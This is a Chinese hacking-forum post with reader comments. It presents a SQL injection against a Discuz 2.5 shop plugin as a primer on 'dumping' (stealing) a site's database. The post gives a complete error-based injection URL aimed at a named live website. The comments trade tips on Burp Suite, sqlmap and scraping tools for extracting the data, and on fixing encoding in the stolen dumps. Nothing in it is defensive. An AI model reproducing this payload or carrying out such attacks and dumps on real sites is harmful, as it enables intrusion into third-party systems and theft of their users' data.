DZx2.5 插件漏洞sql注入 {科普脱裤}
作者:j8g
直接看图吧~~
=======================================
漏洞是以前的了,主要是科普脱裤,转载来分享一下,大牛脚下留情~~
http://nba2kol.org/plugin.php?id=v63shop:goods&pac=info&gid=110%20or%20@`'`%20and%20[/url](select%20*%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20user()))a%20from%20information_schema.tables%20group%20by%20a)b)%20or%20@`'`
直接看图吧~~
=======================================
漏洞是以前的了,主要是科普脱裤,转载来分享一下,大牛脚下留情~~
评论42次
..................科普呢?
burpsuit确实不错,但这方面还是sqlmap强。如果用sqlmap弄这个点,要设prefix和suffix才行。
求可便宜
学xi了
这个是burpsuite的教程么!!
科普了 也被踩了几下。。
其实用python写个采集脚本 也可以,或者用火车头采集我感觉也挺爽的,要是有大牛知道怎么用sqlmap爆这种构造型的注入点,请告知!感谢
测试下去,感谢大牛分享
漏洞看到过,这个方式脱裤学xi了
乱码没解决吧
学xi了哦!!!
学xi了 一个工具一个用法
导出用记事本打开是木有乱码的
字符集不一样重么办
正解~~~~~~~
oxsafe论坛的
火车头生成网址太慢了,脱的时候蛮快的
写的真科普
这个应属于burp suite的教程
实用。。顶一下吧